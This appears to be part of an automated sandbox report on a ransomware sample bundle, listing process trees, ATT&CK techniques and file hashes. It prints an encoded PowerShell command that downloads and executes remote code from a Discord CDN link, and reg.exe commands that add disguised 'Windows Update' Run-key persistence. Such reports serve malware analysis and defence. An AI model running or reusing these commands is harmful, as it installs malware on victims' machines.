        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:3092
- - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Users\Admin\AppData\Roaming\Google123.exe
      "C:\Users\Admin\AppData\Roaming\Google123.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2480
- - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
    HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
    HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
      "C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2464
- - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
    HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1740
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1540
  - - C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
      "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:5056
    - - C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
        
        "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4828
- - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
    HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:844
- - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
    HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4776
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BD366504095.exe" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3700
  - - C:\Users\Admin\AppData\Roaming\BD366504095.exe
      "C:\Users\Admin\AppData\Roaming\BD366504095.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:4480
    - - C:\Users\Admin\AppData\Roaming\BD366504095.exe
        
        "C:\Users\Admin\AppData\Roaming\BD366504095.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2492
  - - C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe
      "C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1996 -ip 1996
1⤵
PID:1440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1996 -ip 1996
1⤵
PID:468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9df2c1b0198535f473a4eed1af0069f4

SHA1
8c2fa1ad91aeaec82a682912e41af53dd5a2a534

SHA256
129e758d070f480bcb621c745a0b7679b42b16c3f890073ea4b609ad4e139d9f

SHA512
0695a4a9fb9ecd21701acc0a5166fca3678c41ac91f682f8db06260cac4b788bb7c7cff3b0c136ccc7479a3ddd564a7bd0011d04e070c1503b52f4d5ec599cfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4083d710d2193dcade0f9f54b468fe3

SHA1
4cbabe5d9fdb1bb484eb5243713e4fbc867cb76f

SHA256
6b49a4fe44eebc86e665dda590c6fd38c71f1cb944c7f4ee40b95aaf93203e12

SHA512
dda9b47ffc3fb9d436aed1dc8de0bd318b6c74ee3800cc68ce3d4c7f797ae5d1033c9ee5d048f3eba7b716cb274ead24dcde6a2ce038eabfd57c06a3466e745b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
332B

MD5
de42a396defd3e76a5f83443b974aa8f

SHA1
b3f14b579f3bd67ebe8e45088ce3e41e98ae39b3

SHA256
1dd3226b5a1377ee56b09ee4144c9ce460156fe96e06f603b9baf3f55cebb2be

SHA512
5738a7b7e9821c459510eb2f734f93cc06a6a9a3a02d1da363bde1c32990ec7824c43c176a39958dc17c89e0b1940dda5a3e5cb00ab4e4a6ce421d30ca03796b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a210b55aded73b2248fc6befecf97ac

SHA1
116740a92b20a51523d34f58ee4073557f15a2fa

SHA256
50b88de1425817b6d8b443056b45039c874f31624deef02fd74f91668dde808f

SHA512
f5b6746e98242c40cd9252143e1050c06cebf891d7cf76772da9c49002607afdd979b9f26399698cc46b706e7f2891a4f228a6459bea9ed09610bbde4a73620c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe

Filesize
20KB

MD5
bd54078b9adbe209a3b2ce024ff94ba0

SHA1
583786c790eee89fff045be901be6c8a2b7a1647

SHA256
3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b

SHA512
218b5869e9cf06d4b5308770011cca8f2b9ac4f8ccb77448b61c11791cd52250bddb92bdca50225747be396972e749450046d37ec8fc7161e62230ab1a10d5cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe

Filesize
3.9MB

MD5
015cb7762f15eaa2bedc61fa02486f4c

SHA1
8e152fc6a4f4c9f3226e8deca1e8ff76d15a49be

SHA256
30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23

SHA512
95e5dc63428e71e4ab395d34ab855bea751343f267567eb43c461ae1e847a3460ea27e24a303fd5275f4608a5b5bdc18c08b59a2ed112049835f7bdc4d011384

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe

Filesize
196KB

MD5
b9dee2e3d9527f4ebc3ac12a3d31fb85

SHA1
fe1bc21eeece8cea940687f5cdf0bb2ba4e12346

SHA256
806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e

SHA512
7fb6df8cb2d8550432d06df799b87e38aa3b8520b5fb3829cde5c9694a3c3cc64f90169870ae4d3ed64edb9033661c25f198c68f5c8b3efd7188cdb16cd3a274

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe

Filesize
51KB

MD5
108abda7915e7b2338376b4fc81a7e87

SHA1
816f14dbb37b0f6bbf60541bf665e43c7dc2e410

SHA256
c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d

SHA512
2ffc6165be49ae2214313f3e5c1159980f5cab363b745a35ed6d3bf2d1d504e47b4ac101adc269d382a75fe2bfccbe2b94aa6dca3c3d3d864cf291975838efb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe

Filesize
51KB

MD5
3876a3cdf0e2d715d4ab1cb3e4b1f056

SHA1
db205f5318852154bf64d6d1d6a5a6de7234542b

SHA256
183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20

SHA512
fcbf14e516e5f59a3161ba682826649c5bfb1cb7b0b8a957fa8017d3974d2d456ab74359dce138c8366f24194780dd424d6453a9a59e926e99bd188408f3facf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe

Filesize
6.2MB

MD5
53b1e433b66ed04ab1204e8b3a9e9785

SHA1
29c5e98ab1e93e118757c174eec0f7fedc1651d7

SHA256
560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a

SHA512
c0b680d88cbdf8851ee9c43a6778cd9e279c76abb3bb88a7361c4d54ea0cb175e41ec12b7a4c587876365331da52387a6e191ca62bfce2934bdc4a7bffae738a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe

Filesize
4.9MB

MD5
7d945a6449b3c6005ad868c03fe95e76

SHA1
53b7e5e40e588b72e07a626f05b43bfc29edfe32

SHA256
86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe

SHA512
2a0d4dbdb108a30c6ba7fa48fb49dac85c753f2b78ff56d783a714ed59757b2e7c06d394d63a5fc7d1da4173eba5e04a9b061e37c439d78ee03dd27dfe0f29d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe

Filesize
6.8MB

MD5
a8f2c9b1c6dc9022290900cbf27af571

SHA1
0bd9ba9ebaf967649c102989a1b28394840106ee

SHA256
d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b

SHA512
60f92d9829283ce05f8aaa13466d572e8772d29b699f782f37bb05d232dcf33bca883f1549e2b6ac9d211b7879042f25a973a57460548e7ba4fafbe057826d29

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Crypmod.gen-a65a6ccefe88fd5e5b4bda67f727faf3a050f9a8cbfc9d1cc74d23da48f81af9.exe

Filesize
12.5MB

MD5
f399421a32a0f651204705875433593b

SHA1
797aedbb2a3f2cd6d47dbe13745a18ade25b106f

SHA256
a65a6ccefe88fd5e5b4bda67f727faf3a050f9a8cbfc9d1cc74d23da48f81af9

SHA512
b98a3923f3e78b036e58ae60e9810705f3984a355e33f54468cd275f61beb89a6fc0849513bb75be77fb16411c5942189475c0342b69523384b411ce88ba6738

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe

Filesize
1.8MB

MD5
31cf5a53a640bc9a073cbe777a2183ce

SHA1
10941c1910e473bf0b8fb0617bf5f39bda577d81

SHA256
c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1

SHA512
4d59ff48d939016a001ad18819e115c9c3a83bc6d41d5ce6ff9ceb0496753e53ac61420eb061235ffac5dd3d2e84cf6f07c87db11cc151cfc96a94c4b6eea0e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan.Win32.Kryptik.gen-0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0.exe

Filesize
1.1MB

MD5
7bf5be704b75c4924b5a29a8ab05ea30

SHA1
53aa3fd3f60aad9b980cb3ed0d1f169add0530b6

SHA256
0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0

SHA512
be3487e110e5dd9db83b3f0cd1b6e467cf06b613a4bc19cb3bae66100d0bc827948a36c67a78fadca3f88503dbc5bf7eb931a1c4f89318cd0fe167127e5ced42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan.Win64.Kryptik.gen-6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81.exe

Filesize
2.0MB

MD5
448096c67b45deb3c7593aa88fb86b75

SHA1
c60c8cc75a3a2950dcb78fc4094007b13c7b099f

SHA256
6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81

SHA512
042f276950948d7d7ba3f3965525cb0c64277b7f31e12742bb280e1b520dbb74274253eae748a148d68ee93eb713930bec0b7499a2e5f0202ba0b74975a8d237

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe

Filesize
3.7MB

MD5
87213006cba133fd2f5556cab1b702a9

SHA1
f5ac580bdd63a4c3770602dd05f35ab1ac215191

SHA256
504cdfbb04059dc8553c56d17f114f8b3e5f6ac050cab99de199b73e9f5c9608

SHA512
1813b9d6d281bd467bbb11b2bb44da87389d873d6cccbe1af0dd242c21db9179c98ddb90f85c95587d367da1f5f049f9644abd4d0ae3dbf8af7387c75e2fa4c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Trojan-Ransom.Win32.Cryptodef.aoo-fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc.exe

Filesize
73KB

MD5
18ffed6f715aea3ba8cd567b330faf20

SHA1
8f835470057ba4f832e812fc9f58dd42c0a7acc4

SHA256
fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc

SHA512
c863ac250d1dac03362ce0fd9b5f3ccb0e45084e0715533dede7ab420eb7b4a7fb58228ad3d9c516352a8474ff07c205c64e7709b9d5a7ee5490bfa6e10e51ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Trojan-Ransom.Win32.GenericCryptor.czo-877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66.exe

Filesize
184KB

MD5
03531048f4d9369c850888945181cf43

SHA1
1e214deb22fa4dd095d9351d91ac5563aad5e7ba

SHA256
877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66

SHA512
f312faed2f987a9da2ee145f078645825f2785ce483ded263fa3b3d6a884a5e67cad3ffde8dff4a82c67b010262926365d8f947c74dec04a26ee2703f2ecdbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Trojan-Ransom.Win32.GenericCryptor.czx-e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894.exe

Filesize
536KB

MD5
e3584b71a215db2c629e6e2877edd6b4

SHA1
01bee60375b7a275f818b051ddc0ddb4a8426006

SHA256
e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894

SHA512
d57474c0cdf0df95b703afbfb1f801765b4fe1030eff1fc1ef971da0392474c585f0c5ce57918528d0a61fce6feaf49b0a80e614f183fede6aa74f6436ea94bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Trojan.Win32.Kryptik.bvw-f3cdb519cba210689a115f86cf1554b3edcad5e12746e109ca7e373caad24fbe.exe

Filesize
548KB

MD5
b678abc39649637794c067fd5b887084

SHA1
52fd922bd1cbddc73b392611e1df9457a3fd0fd8

SHA256
f3cdb519cba210689a115f86cf1554b3edcad5e12746e109ca7e373caad24fbe

SHA512
7fdbcd04119d39eff57094b43471fd902fcdec2b7b286d1d278123d8e85c56a37b2d9451d1afbf1ff6dfbc2fc6e9d9ca256b30fd4a01ce8e3a92088ceb2585ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs

Filesize
267B

MD5
3d01ee4659d80173c2e4d6ad05922d60

SHA1
982aaa71f725128aa73669c2869feff391797565

SHA256
121f3478b61beff37c8a3f64f55ddbef4d2b8097f1c013d9a3ceb709bdc526c2

SHA512
b1d5a857f0aee8bd73095c714372ad4d7786d7ad4348275bae603a2e2644b87e3e4b2f0930d82b5cabcef59f92c93b940a29053a8dad4104509149e034c8fae1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe

Filesize
16KB

MD5
3e0008cc2c154ed7421566bfbcef4c1b

SHA1
d9541802d6743d8297e35df54b1e96dd0f0d798e

SHA256
c8c5d40c561da8cd603ef7efbca59fc0a7c8463032469315d2d06d0cf01a3099

SHA512
43008875d176fe858f698d0d934a81cef02d5c7313bd1652ec6566892f1ed505668643119deab28186ef5bebabf9f95fb421443959a1157e6f9d68a9bfec789e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yyrkyaip.tny.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp

Filesize
1.4MB

MD5
ae9890548f2fcab56a4e9ae446f55b3f

SHA1
e17c970eebbe6d7d693c8ac5a7733218800a5a96

SHA256
09af8004b85478e1eca09fa4cb5e3081dddcb2f68a353f3ef6849d92be47b449

SHA512
154b6f66ff47db48ec0788b8e67e71f005b51434920d5d921ac2a5c75745576b9b960e2e53c6a711f90f110ad2372ef63045d2a838bc302367369ef1731c80eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-SR0GO.tmp\ISDone.dll

Filesize
380KB

MD5
63dc27b7bc65243efaa59a9797a140ba

SHA1
22f893aefcebecc9376e2122a3321befa22cdd73

SHA256
c652b4b564b3c85c399155cbb45c6fb5a9f56f074e566bfd20f01da6e0412c74

SHA512
3df72dc171baa4698dfd0c324a96dde79eb1c8909f2ff7d8da40e5ca1de08f1fc26298139ab618e0bb3fa168efe5d6059398b90d8ff5f88e54c7988c21fb679e

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-SR0GO.tmp\idp.dll

Filesize
220KB

MD5
af555ac9c073f88fe5bf0d677f085025

SHA1
5fff803cf273057c889538886f6992ea05dd146e

SHA256
f4fc0187491a9cb89e233197ff72c2405b5ec02e8b8ea640ee68d034ddbc44bb

SHA512
c61bf21a5b81806e61aae1968d39833791fd534fc7bd2c85887a5c0b2caedab023d94efdbbfed2190b087086d3fd7b98f2737a65f4536ab603dec67c9a8989f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-SR0GO.tmp\innocallback.dll

Filesize
63KB

MD5
1c55ae5ef9980e3b1028447da6105c75

SHA1
f85218e10e6aa23b2f5a3ed512895b437e41b45c

SHA256
6afa2d104be6efe3d9a2ab96dbb75db31565dad64dd0b791e402ecc25529809f

SHA512
1ec4d52f49747b29cfd83e1a75fc6ae4101add68ada0b9add5770c10be6dffb004bb47d0854d50871ed8d77acf67d4e0445e97f0548a95c182e83b94ddf2eb6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe

Filesize
51KB

MD5
2256c5927fb57a2ffbb386da06ea2d0e

SHA1
15453757f75683ce8e5892f709c640bb99b6b055

SHA256
26e7d625b4b68d72ded4557ef17b06e72862f3e4a61a94fb1af184212ab775ec

SHA512
7a765ecf45a0870fc1129686c50e3572af2f464bbba68f70017528a4e9bdbb08473ca31a1d99bad516c0baf5c39bc97e2139a03570bc57d3b87e98c617ba77fe

Download Submit
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

Filesize
6.2MB

MD5
59bf24d11e5a6bf125a613687c9d1e0a

SHA1
d13e17a1991586600d55ea3d0dcc38dca1af016f

SHA256
20c5c3f37310eaae6b8d188b24ebbb90f3b7af664a7b1663e23b8c3c193c768b

SHA512
18360ab4a57c16e818c339c75d125fa449441f950b98e4ace1f76b96474310afb9ff21261e1548f0123f0985ebc540b85a001131e944e5f8f1362b31f19366b5

Download Submit
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

Filesize
6.2MB

MD5
d56af668d37ed2dc777a62a08d311c83

SHA1
07214e4dd31d51a5b2d39d967323d9aef2bc53ee

SHA256
e7a1fdc34a553dd80d198d4939b8575ed0f5a7dff47f755b46fc6e18cee5138e

SHA512
ef14dfb590a448d367ffec27b42ae23cf90b6c6d4f0d4d0c99f9a764469261c2f01331b3246e98b309be6f0ade7086767924cb0e353afb05b0b14ff8e8dcf9b4

Download Submit
C:\Users\Admin\AppData\Roaming\BD366504095.exe

Filesize
6.8MB

MD5
e14f38980007ecd9077abe884b509cd1

SHA1
1206f13f9d56aed9625532f758897d90218002e1

SHA256
a0900c168a402c4eaa6143ef6e6b5a55be062434197985e28a30dfd3b0711d60

SHA512
ca6d59ac7cdfcb0026784efc6fddd2d0e2aecda098e1050edda78421d0c67a9080dff766ad480f95f5279db1c8e519c943b91554a13a1e01e1eae8e82099e440

Download Submit
C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

Filesize
1.0MB

MD5
5ca5d3c4b8fdea4b0b751fc6078e217d

SHA1
920324b18bc5e31ee75d13ffdfd869dcedbdcfed

SHA256
7ab6749cceb79016df35d612c17b33df4f2d25e8f1147bcc0273b0cfae71801f

SHA512
4b10ded7e7d41e368524ae29e831eb2cc19677a65edb5b1ce62e706ce10ca89425275236a442c14144fad69f598a436c533ba53342ce7ca106aab074995e9f87

Download Submit
C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

Filesize
1.0MB

MD5
ff312b356a09f7409e7d2ee92dee7029

SHA1
1dc61fd5d0ea3e5bc362e0bad0196980c44a796a

SHA256
92bba5ae211e3e384b00600f9b471f2f96b99ddd3526479b4f7d52959a105f33

SHA512
03c82e41d0200e4302833fd32644da78e202674fa268222ae6cec8c8fd6bce0ce6149c3639e80878aa46ecaedc8076c611c593b4d9373697b7b2c0fc7866e198

Download Submit
C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

Filesize
1.0MB

MD5
a2f259ceb892d3b0d1d121997c8927e3

SHA1
6e0a7239822b8d365d690a314f231286355f6cc6

SHA256
ab01a333f38605cbcebd80e0a84ffae2803a9b4f6bebb1e9f773e949a87cb420

SHA512
5ae1b60390c94c9e79d3b500a55b775d82556e599963d533170b9f35ad5cfa2df1b7d24de1890acf8e1e2c356830396091d46632dbc6ee43a7d042d4facb5dad

Download Submit
memory/768-898-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/768-938-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/768-908-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/1192-771-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1192-899-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1740-937-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/1740-906-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/1740-883-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/1896-726-0x0000000004E70000-0x0000000004F0C000-memory.dmp

Filesize
624KB

Download
memory/1896-732-0x0000000004FC0000-0x0000000005052000-memory.dmp

Filesize
584KB

Download
memory/1896-741-0x0000000005150000-0x00000000051A6000-memory.dmp

Filesize
344KB

Download
memory/1896-740-0x0000000004F20000-0x0000000004F2A000-memory.dmp

Filesize
40KB

Download
memory/1896-725-0x00000000005C0000-0x00000000005D4000-memory.dmp

Filesize
80KB

Download
memory/1896-730-0x00000000054D0000-0x0000000005A74000-memory.dmp

Filesize
5.6MB

Download
memory/1996-709-0x0000000000400000-0x0000000000402000-memory.dmp

Filesize
8KB

Download
memory/2464-897-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
